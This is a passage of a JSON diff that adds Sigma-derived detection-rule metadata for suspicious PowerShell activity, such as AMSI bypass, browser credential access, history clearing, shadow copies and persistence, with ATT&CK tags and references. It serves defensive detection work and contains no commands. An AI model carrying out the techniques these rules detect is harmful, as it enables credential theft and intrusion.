"815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + "filename": "posh_pm_susp_ad_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download command", + "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "value": "Suspicious PowerShell Download - 
PowerShell Module", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pm_susp_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "value": "Use Get-NetTCPConnection - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2021/12/10", + "filename": "posh_pm_susp_get_nettcpconnection.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/12", + "filename": 
"posh_pm_susp_invocation_generic.yml", + "author": "Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pm_susp_invocation_specific.yml", + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", + "value": "Suspicious Get Local Groups Information", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/12", + "filename": "posh_pm_susp_local_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator script" + ], + 
"logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "uuid": "e3818659-5016-4811-a73c-dde4679169d2", + "value": "Suspicious Computer Machine Password by PowerShell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2022/02/21", + "filename": "posh_pm_susp_reset_computermachinepassword.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "uuid": "6942bd25-5970-40ab-af49-944247103358", + "value": "Suspicious Get Information for SMB Share - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + ], + "tags": [ + 
"attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + "filename": "posh_pm_susp_smb_share_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ], + "creation_date": "2021/07/20", + "filename": "posh_pm_susp_zip_compress.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/05", + "filename": "posh_pm_syncappvpublishingserver_exe.yml", + "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community", + "level": "medium", + "falsepositive": [ + "App-V clients" + ], + "logsource.category": "ps_module", + 
"logsource.product": "windows" + } + }, + { + "description": "Detecting use WinAPI Functions in PowerShell", + "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", + "value": "Accessing WinAPI in PowerShell", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ], + "creation_date": "2020/10/06", + "filename": "posh_ps_accessing_win_api.yml", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", + "value": "Access to Browser Login Data", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "creation_date": "2022/01/30", + "filename": "posh_ps_access_to_browser_login_data.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell scripts that adds a Name Resolution 
Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", + "value": "Powershell Add Name Resolution Policy Table Rule", + "meta": { + "refs": [ + "https://twitter.com/NathanMcNulty/status/1569497348841287681", + "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ], + "creation_date": "2021/09/14", + "filename": "posh_ps_add_dnsclient_rule.yml", + "author": "Borna Talebi", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "value": "PowerShell ADRecon Execution", + "meta": { + "refs": [ + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/07/16", + "filename": "posh_ps_adrecon_execution.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "uuid": 
"e0d6c087-2d1c-47fd-8799-3904103c5a98", + "value": "AMSI Bypass Pattern Assembly GetType", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ], + "creation_date": "2022/11/09", + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "value": "Silence.EDA Detection", + "meta": { + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" + ], + "creation_date": "2019/11/01", + "filename": "posh_ps_apt_silence_eda.yml", + "author": "Alina Stepchenkova, Group-IB, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects AS-REP roasting is an attack that is often-overlooked. 
It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "value": "Get-ADUser Enumeration Using UserAccountControl Flags", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", + "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_as_rep_roasting.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "value": "Automated Collection Command PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ], + "creation_date": "2021/07/28", + "filename": "posh_ps_automated_collection.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", + "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", + "value": "AzureHound 
PowerShell Commands", + "meta": { + "refs": [ + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069" + ], + "creation_date": "2021/10/23", + "filename": "posh_ps_azurehound_commands.yml", + "author": "Austin Songer (@austinsonger)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", + "value": "Windows Screen Capture with CopyFromScreen", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_capture_screenshots.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "value": "Clearing Windows Console History", + "meta": { + "refs": [ + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1070.003" + ], + "creation_date": "2021/11/25", + "filename": "posh_ps_clearing_windows_console_history.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", + "value": "Clear PowerShell History - PowerShell", + "meta": { + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2022/01/25", + "filename": "posh_ps_clear_powershell_history.yml", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "value": "Execution via CL_Invocation.ps1 - Powershell", + 
"meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "posh_ps_cl_invocation_lolscript.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", + "value": "Execution via CL_Invocation.ps1 (2 Lines)", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "posh_ps_cl_invocation_lolscript_count.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "value": "Execution via CL_Mutexverifiers.ps1", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + 
"creation_date": "2020/10/14", + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", + "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", + "value": "Powershell Create Scheduled Task", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2021/12/28", + 
"filename": "posh_ps_cmdlet_scheduled_task.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "uuid": "db885529-903f-4c5d-9864-28fe199e6370", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/11/17", + "filename": "posh_ps_computer_discovery_get_adcomputer.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "value": "Powershell Install a DLL in System Directory", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ], + "creation_date": "2021/12/27", + "filename": "posh_ps_copy_item_system_directory.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", + "value": "Registry-Free Process Scope COR_PROFILER", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.012" + ], + "creation_date": "2021/12/30", + "filename": "posh_ps_cor_profiler.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a local user via PowerShell", + "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "value": "PowerShell Create Local User", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2020/04/11", + "filename": "posh_ps_create_local_user.yml", + "author": "@ROxPinTeddy", + "level": "medium", + "falsepositive": [ + "Legitimate user creation" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "value": "Create Volume Shadow Copy with Powershell", + "meta": { + "refs": [ + "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/01/12", + "filename": "posh_ps_create_volume_shadow_copy.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "value": "Data Compressed - PowerShell", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560" + ], + "creation_date": "2019/10/21", + "filename": "posh_ps_data_compressed.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Highly likely if archive operations are done via PowerShell." + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "value": "Powershell Detect Virtualization Environment", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", + "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1497.001" + ], + "creation_date": "2021/08/03", + "filename": "posh_ps_detect_vm_env.yml", + "author": "frack113, Duc.Le-GTSC", + "level": "medium", + "falsepositive": [ + 